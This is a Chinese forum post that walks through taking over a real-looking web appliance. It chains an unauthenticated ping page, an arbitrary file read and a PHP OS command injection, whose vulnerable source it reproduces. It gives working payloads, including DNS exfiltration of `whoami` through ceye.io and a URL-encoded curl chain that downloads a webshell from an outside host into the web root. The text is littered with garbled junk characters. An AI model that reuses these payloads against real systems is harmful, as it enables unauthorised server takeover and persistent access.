中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]
作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、
5 z  a( N3 l- f4 n9 Y** **寻找突破口**
& P+ E/ R$ C: K) I5 N6 l$ `/ a) J+ X; h8 v7 b4 h) \% ^/ x
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**2 e! F) y+ q4 L: l6 }

% Q% e! J2 k8 p# t  H) n7 h  {![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
4 D1 \2 c7 A, D7 ]! C) @
) [! ]2 o! x1 z0 m* M0 G: a
* u& Q$ c! r7 l5 z4 d
0 L+ K9 Q5 y* |' G5 Z$ I**发现reporter和[Technology,
! Q! S! g' }+ u  }+ gInc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**4 K- z/ U( J9 k7 f; f* y3 G, S0 Q
% E7 A2 M# }4 {: Q. y' m: u
**地址为:**6 U: b! _1 h2 n) W$ q5 Q

: z1 l8 T7 q5 t; ~! U" w& F[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**,如图:**
" s9 e* |$ E/ n2 a1 h2 X0 b& \: |/ ~+ x3 P9 d
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")9 d4 O& G( N# b) f! U5 R

, H- a) v% H  G  C% [% w
/ n: B+ z. p  X, o# p0 d; Z: L6 L/ j0 r5 j
**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**
3 ?1 x- W0 v3 @! x# ?, s( [8 U% E7 P
" G* e! i/ l5 u( G3 y**`whoami`.1111.ceye.io** **,如图:**3 N3 {/ t. O# Q  R# c4 I- h
# s; X. E/ M2 y2 b. X$ X
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
0 s" a* A7 s9 {0 B' T( [" l1 n
2 l! Q8 C3 j; G& |9 D) R+ `! @9 s6 P

' _: \6 ], n2 M% |: s8 F0 q1 c**返回dns记录如图:**
8 S$ y" V( ]% ~  o) o! o1 W. x' W6 E8 ~8 P$ X% B; R* D
![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
+ y# L4 ~2 E$ p, b7 U0 e
% p0 c& C" _9 H  i! E  Q3 @" t: Z( w. l

9 {2 Y" i. l/ l' z% s4 u' D  ~" C**发现当前用户权限为root**
) }0 i6 T$ |* h" N9 C+ K! V( p1 o+ x( Q6 h( C
**一、* T1 G5 q4 A. e4 b& h0 u- l9 b
** **通过漏洞组合getwebshell**% h/ X% b+ u4 U
! G0 T* C+ u& ~/ c* y- S
**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**
  C  l+ n! g4 \# @0 P
$ n+ m( }" ]3 G; j& e( X![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
7 d5 ^  X' w: @' C6 T0 B8 v1 I0 I
; J4 }& ?: ^6 K6 X0 C7 e2 Y9 g' q
+ |* t5 T' V/ w& d. V# c0 W( O: a! w1 A" G8 n. c5 P
**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**/ T4 H6 L3 c$ \4 W0 i" I

! J1 l* t7 d: w9 j1 c) u**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**
1 J! Z8 Y5 S  H- }6 c/ B+ u0 O
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")) d! Q/ F( x& w0 m) K+ G5 b

, J9 \' x: l" L; F( X3 v) q5 g4 S**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**- L$ o- T: z6 L4 \5 b8 w9 @
/ v/ |+ Y2 ~1 g7 t* {# W
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\9 ?- l8 e- O/ o

( f7 u' U4 z+ f  A9 M& {, B0 d8 f$ [. O! y& u
**源代码为:**; e! T7 w0 c7 Q5 u: F' \: m& e
/ }! t0 Y  [7 `( h( y  M
<?php8 L" Q4 ~5 M  m+ c) m7 `( {
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");$ \1 H  ~8 d" r+ G+ s# g
?>* ]# h; ]2 p3 Q# O
' W( x; }, g! Q! Z: s* M
<?php0 V/ S6 P1 e! A) y( Q
; H" T! Y8 u3 }* F5 ~4 T8 V

& [( e' [4 ^7 H! A
& Y8 X$ C2 R8 ~: }; Z+ Zsession_start ();
& w# K7 P' X, Y: a# Q9 G( {7 g) r0 E8 Z4 D: B+ f$ ~* L2 p; t
- `& }1 T0 U& B, u
' ?/ Y/ y, O5 ^' _% z. f
3 t  ~; M3 I; p

. i  C# O5 e0 D" `( Y! h% M* L# w7 |/ R/ ]7 ?& P3 W$ j" h: E5 Q
/ D! v1 _2 x5 p# I2 ~- w3 s
if ($_GET ["objClass"] == "")
- e6 Y( O, k4 U# R( \- S
, f8 J) @- E: c4 E" }# F- A! @7 v
1 N* p6 x0 p! W% G; E
      exit ();
& |" \: [7 C! c0 y0 |* d* U6 `3 j2 T5 ]
+ z2 i# z7 V5 W! o- d

) h+ K% O5 Z7 N- @. Y8 m7 W$param = $_REQUEST;
( J) E7 A, r% y0 I  u2 B
0 m  D& ~3 t9 U
! f: P( `) ^' ~! D) Z0 g1 [0 B  t: l) o  e8 D9 i
- d$ z) x( l) p
! F6 y# X1 ~8 I. n0 q6 x! l0 t

1 S, S; v' k. G1 w0 O+ B6 z& O/ K/ G9 \8 h/ W3 l" g( Q
//echo "\n--------------------------\n";
" U% \- t: D2 {9 m, W9 a- U2 }9 p: W; v- }# C

2 L2 A3 [' E+ y. y" Q- z! Z" `" L
//print_r($param);  H, \- h- q; X+ v/ Z
* |3 v+ p  l: ~: ~2 B) U( }  C
+ D! u$ t6 j& M1 U5 {! F, }
) A2 `0 `" c+ e1 \' V( `( d
//echo "\n--------------------------\n";* `( {% a6 r) k
% C( S$ j+ R6 T

% W9 F: O  l% T1 }; K/ C0 f5 ]' a+ B8 @1 U: L5 ^* h+ _: }% L6 j
[if ($_GET ["method"] ==& _5 _% i/ r* u% V8 m) I( I
"getList" || $_GET ["method"] == "import" ||2 \7 M$ U, f- K2 \# F" j  S9 H; e0 z' S
$_GET ["method"] == "processAlarm") ](){! B& P3 G& K/ b$ I% D' G  ~7 N: s

2 z8 u6 U' J% ]" H7 u5 {4 X3 O( y/ p& U1 x
4 g) P7 C& g, _! G
      $param8 d+ @$ \4 E5 L
["user"] = $_SESSION ["s_userName"];' ~2 G6 y. ~5 N3 T4 m
" J1 n- L& r5 z" E
2 D& z+ t0 G/ p9 |" T! ~" l$ e/ q) F

( t6 K: \$ Q5 f) f2 b4 x      $param
+ Q. k0 B" E5 \["lan"] = $_SESSION ["lan"];8 P! t3 T  O3 P- W/ ], h% c
1 v6 l4 v) z2 k4 S8 q

' z! p1 l# j1 |  t" X
2 g5 T0 G. R  E! A* s3 H' l      $param& W' ]$ }5 g: T# @8 P
["regUserpath"] = $_SESSION ["regUserpath"];
1 z( [6 s+ f  n- T* ]( ~+ Q: d
; [* O+ Y3 ?/ A5 z3 Q- K! m
( |9 }$ C% l  R# U5 ^
0 j6 ]& t8 [. s8 G3 l/ T9 `' R" t   
- \2 F7 S3 J4 p; k" s
8 i$ X; k4 g- e4 {
2 ]: U- q: o- P1 M( b3 e
9 z7 ?* a0 V; @( c8 `. U      exec (: r$ M; e6 m- i: I' H. ~$ l
"rm -rf /tmp/cache" );  w7 _5 X3 `4 }. f

7 R/ [" r/ i( @
( a7 [7 H9 I7 z* l# L
$ _0 n# @: V. X- T" x8 `      [$cmd = "/usr/local/php/bin/php ".$_SERVER  A( v3 d1 F$ `# m$ o* t/ ~% z
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
2 L+ J, |$ a9 p- F
2 b2 @/ e0 S) v- k3 V, i  H/ M: c
6 t5 k: {# y  l" z- r% s- d) b3 t+ a% S+ e
      $cmd .=
( F# S6 Q. F, \) r+ W, O2 v$ N8 Q" " . $_GET ["objClass"];: Y. ?6 ?/ b8 F9 O3 u* a1 k8 z6 g

; y6 O' ~: ]& f* J1 q
2 e$ C- v. m+ E1 P7 y; y+ h
6 s' m% C5 T. X+ k      $cmd .=
% O) K' @) K& H  b" " . $_GET ["method"];8 S! G7 A7 U7 y9 J. k

6 }0 q2 S$ i5 [2 p
5 i* U/ d- Y  B& a/ C% T# X2 ]
  H% E# J* J: }/ i( b, L3 B      $cmd .=+ n" I. a/ V: ?6 c8 W0 [0 |
" " . base64_encode ( json_encode ( $param ) );4 O" z, g* B5 J! N6 R  s
) j! u: K$ V5 n" s1 |
/ \+ G% i( f0 k* @

! s5 M' @2 P9 B0 K: g0 k      [file_put_contents("/tmp/query_cmd",$cmd);]()
  @- `1 M2 K8 S9 ]1 r
( m! T* |5 D7 k( B! Z8 l! ]1 a! X% I( t7 v

/ S1 F9 `/ S  c7 i( p* w& G      exec ( $cmd . "
/ v% r( q/ p2 P: q> /dev/null &" );
7 T3 h" b+ B% d6 g, R
# J1 |# N, ^9 r3 C  g, O
' ^6 O- _2 `" S% d' Z' `4 I: T4 l+ _  d3 {* p- Q

! h. @' K: v# ^- r3 e  H8 _2 w+ P& N! G1 k1 N& T
} else {0 ?) A/ g3 d2 Z( ?- o( J
3 d; w0 q% A& G. G! y

; j( j, @, [! R, A3 N( R0 Y0 j, d9 a! V" D. e
      require_once
( S0 _# @5 Y* F/ \($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
" \+ [2 }; f$ ?# a/ `8 Y5 k: T0 n+ T; M8 E6 ?9 t

* K+ O7 I1 \; j2 _/ n4 `* o2 y# i( L* F4 U0 r: o+ B! |
      $obj = new4 ]8 m) i  ?0 ^) \! B* S
QueryInterface ();. P+ A2 }4 l% Y
$ O6 o; B, ^; L$ A3 ]
1 A+ M+ H/ x7 [! l

5 `; ]+ O4 F5 Q* q- T      $instance =6 {! Z& }& L5 |
$obj->getInstance ();! B5 ?3 m! I! K2 P; w5 T; I4 m

/ Q# M" h" J7 x/ L* a
, Z5 Q) s3 ^! W/ M9 l; s6 K5 U& C# d3 @) ^: w) i2 ]
      $instance->invokeMethod
& T" t$ w6 D3 O# K, X# |( $_GET ["objClass"], $_GET ["method"], $param );7 }  |9 `' y4 I( ~! O7 P' W

( D' w" d7 }" ]  I
3 \4 F5 p& _1 C- k6 z
9 A0 ^8 j8 C1 [, A}9 P: p2 u& G0 K- A% u' W: @

+ b2 R0 N' p. A; o5 [- v! _4 o% O7 ?  |  j9 J1 B) Y

8 p2 A- s. p; _# Hexit ();
: T. n/ G5 Q' N" S( j
! a& y! y) B4 t; }8 U
+ K% O0 s- {' [) m# M2 ^4 f5 [# X) @# k  @( W( i
?>  q+ c/ t, U% O% A
$ y0 Y. W# I6 k
**经常简单审计发现if ($_GET
! ?0 }5 y& M0 X& ^& k" ]; C["method"] == "getList" || $_GET ["method"] ==/ K% K3 l. d+ o1 h% g! l
"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =
( w7 `- ?! K! S7 }/ k% m! J"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] ." [( Y8 h. d9 o! m5 M+ C+ n
"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**, }7 }& A9 o- @* W" D
/ I  _9 D- f) G
**      exec ( $cmd
; }, p' o/ Z+ {9 ?7 ?1 [* p2 Q. "  > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**
7 M9 ?* g0 E' A6 O; A6 b0 L( B8 I0 P- T5 |8 z% z- y+ [# ?
& ^1 a' }4 o) l2 t
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
* }' T2 L4 f  `: a" b
) |+ S9 N3 U% j2 i* g7 V3 H9 s# s- h) x" d4 K8 M- o0 ?- _7 b

; {1 Q' {7 C) f& y# D, a**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**- P' ~/ g. |- P
. s, E) a* r( g5 W
**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**+ l- x: n' l0 H( M
  _6 ~9 I8 O  J4 ?4 i. O- p* Q: @
**我们用url解码如下:**! A* \* ?  b6 z, e, I; {
! w3 w9 m$ ]$ P' v0 \% s* ]2 I& C6 w
**|curl http://1.1.1.1/qYCwxRz1.zip -o7 d* i8 ^! `3 U8 Y# K. S
/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o
( n8 I9 h4 ?; b2 {/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php). V6 f1 y. @" E
. E+ F2 H: z0 r' L( D% Z
**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**
% e/ u1 k* Q' {) \' b& \) Q, F  J. u* `6 M$ @9 S

/ O% S8 Z3 }2 a& u& b# o% A![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
2 a7 l$ ^2 r3 P7 P) ?) _
) Y( U: c5 S2 {0 O! A6 F
- g& s/ V/ a$ I' @- e
0 N* a3 a1 k0 ~% d
9 N4 V  V+ f. ]+ V2 C**三、总结**
/ E3 I' s, I8 C+ L5 t, r6 q; n7 B; j) [9 M: f! S( [$ S: g' A+ o
**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。*** Y; C& K3 B2 D$ w3 a1 ?0 o
. d! {  d8 d4 k
**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **
3 v+ q6 t+ p/ H+ E- Z# g, _3 h, O[/md]



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2